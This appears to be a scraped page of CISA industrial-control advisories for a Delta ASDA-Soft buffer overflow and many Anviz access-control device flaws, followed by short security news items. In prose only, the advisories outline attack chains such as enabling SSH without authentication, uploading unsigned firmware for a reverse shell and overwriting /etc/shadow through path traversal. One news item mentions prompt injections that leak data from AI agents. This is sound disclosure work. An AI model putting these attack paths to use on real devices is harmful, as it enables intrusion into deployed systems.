vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-16 Date Revision Summary 2026-04-16 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code. The following versions of Delta Electronics ASDA-Soft are affected: ASDA-Soft <=V7.2.2.0 CVSS Vendor Equipment Vulnerabilities v3 7.8 Delta Electronics Delta Electronics ASDA-Soft Stack-based Buffer Overflow Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Taiwan Vulnerabilities Expand All + CVE-2026-5726 A stack-based buffer overflow vulnerability is triggered in ASDA-Soft version 7.2.0.0 during the parsing of malformed .par files. View CVE Details Affected Products Delta Electronics ASDA-Soft Vendor: Delta Electronics Product Version: Delta Electronics ASDA-Soft: <=V7.2.2.0 Product Status: known_affected Remediations Vendor fix Delta Electronics recommends users download and upgrade ASDA-Soft to v7.2.6.0 or later. If you have any product-related support concerns, contact Delta via the portal page at https://www.deltaww.com/en-US/service-support/contact-us?type=1 for any information or materials you may require. https://www.deltaww.com/en-US/service-support/contact-us?type=1 Mitigation Delta Electronics provides the following general recommendations: Do not click on untrusted internet links or open unsolicited attachments in emails. Avoid exposing control systems and equipment to the Internet. Place control system networks and remote devices behind firewalls, and isolate them from the business network. When remote access is required, use a secure access method, such as a virtual private network (VPN). Mitigation For more information, see Delta Electronics advisory Delta-PCSA-2026-00007 athttps://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00007_ASDA-Soft%20Stack-based%20Buffer%20Overflow%20Vulnerability%20(CVE-2026-5726).pdf https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00007_ASDA-Soft%20Stack-based%20Buffer%20Overflow%20Vulnerability%20(CVE-2026-5726).pdf Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H Acknowledgments Feng Xiong of TrendAI Zero Day Initiative reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely. Revision History Initial Release Date: 2026-04-16 Date Revision Summary 2026-04-16 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow attackers to conduct reconnaissance, capture or decrypt sensitive data, alter device configurations, gain unauthorized administrative or root‑level access, execute arbitrary code, compromise credentials or communications, and ultimately obtain full control over affected devices. The following versions of Anviz Multiple Products are affected: CX2 Lite Firmware vers:all/* (CVE-2026-32648, CVE-2026-40461, CVE-2026-35682, CVE-2026-35546, CVE-2026-40066, CVE-2026-33569) CX7 Firmware vers:all/* (CVE-2026-33093, CVE-2026-35061, CVE-2026-32648, CVE-2026-40461, CVE-2026-35546, CVE-2026-40066, CVE-2026-32324, CVE-2026-31927, CVE-2026-33569) CrossChex Standard vers:all/* (CVE-2026-40434, CVE-2026-32650) CVSS Vendor Equipment Vulnerabilities v3 9.8 Anviz Anviz Multiple Products Missing Authorization, Missing Authentication for Critical Function, Improper Neutralization of Special Elements used in a Command ('Command Injection'), Download of Code Without Integrity Check, Use of Hard-coded Cryptographic Key, Relative Path Traversal, Cleartext Transmission of Sensitive Information, Improper Verification of Source of a Communication Channel, Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Background Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Defense Industrial Base, Energy, Financial Services, Food and Agriculture, Government Services and Facilities, Healthcare and Public Health, Information Technology, Transportation Systems Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-33093 CX7 is vulnerable to an unauthenticated POST to the device that captures a photo with the front facing camera, exposing visual information about the deployment environment. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2026-35061 CX7 is vulnerable to the most recently captured test photo that can be retrieved without authentication, revealing sensitive operational imagery. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2026-32648 CX2 Lite and CX7 are vulnerable to unauthenticated access that discloses debug configuration details (e.g., SSH/RTTY status), assisting attackers in reconnaissance against the device. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2026-40461 CX2 Lite and CX7 are vulnerable to unauthenticated POST requests that modify debug settings (e.g., enabling SSH), allowing unauthorized state changes that can facilitate later compromise. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2026-35682 CX2 Lite is vulnerable to an authenticated command injection via a filename parameter that enables arbitrary command execution (e.g., starting telnetd), resulting in root‑level access. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2026-35546 CX2 Lite and CX7 are vulnerable to unauthenticated firmware uploads. This causes crafted archives to be accepted, enabling attackers to plant and execute code and obtain a reverse shell. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-40066 CX2 Lite and CX7 are vulnerable to unverified update packages that can be uploaded. The device unpacks and executes a script resulting in unauthenticated remote code execution. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-494 Download of Code Without Integrity Check Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2026-32324 CX7 is vulnerable because the application embeds reusable certificate/key material, enabling decryption of MQTT traffic and potential interaction with device messaging channels at scale. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVE-2026-31927 CX7 is vulnerable to an authenticated CSV upload which allows path traversal to overwrite arbitrary files (e.g., /etc/shadow), enabling unauthorized SSH access when combined with debug‑setting changes. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-23 Relative Path Traversal Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N CVE-2026-33569 CX2 Lite and CX7 administrative sessions occur over HTTP, enabling on‑path attackers to sniff credentials and session data, which can be used to compromise the device. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-319 Cleartext Transmission of Sensitive Information Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N CVE-2026-40434 CrossChex Standard lacks source verification in the client/server channel, enabling TCP packet injection by an attacker on the same network to alter or disrupt application traffic. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CrossChex Standard: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-940 Improper Verification of Source of a Communication Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-32650 CrossChex Standard is vulnerable when an attacker manipulates the TDS7 PreLogin to disable encryption, causing database credentials to be sent in plaintext and enabling unauthorized database access. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CrossChex Standard: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments An anonymous researcher reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-16 Date Revision Summary 2026-04-16 1 Initial Publication Legal Notice and Terms of Use

While enterprises breaches make more headlines, smaller incidents tend to be under-reported, if at all, allowing campaigns to last longer with less disruption.

Attackers can abuse the near-maximum severity flaw in nginx-ui to restart, create, modify, and delete NGINX configuration files.

Two recently fixed prompt injections in Salesforce Agentforce and Microsoft Copilot would have enabled an external attacker to leak sensitive data.

It is the second long-term social-engineering attack this month, after the $280 million exploit of the Drift Protocol.

Microsoft has introduced new Windows protections to defend against phishing attacks that abuse Remote Desktop connection (.rdp) files, adding warnings and disabling risky shared resources by default. [...]

The Kraken cryptocurrency exchange announced that a cybercrime group is trying to extort the company by threatening to release videos showing internal systems that host client data. [...]

Microsoft today pushed software updates to fix a staggering 167 security vulnerabilities in its Windows operating systems and related software, including a SharePoint Server zero-day and a publicly disclosed weakness in Windows Defender dubbed "BlueHammer." Separately, Google Chrome fixed its fourth zero-day of 2026, and an emergency update for Adobe Reader nixes an actively exploited flaw that can lead to remote code execution.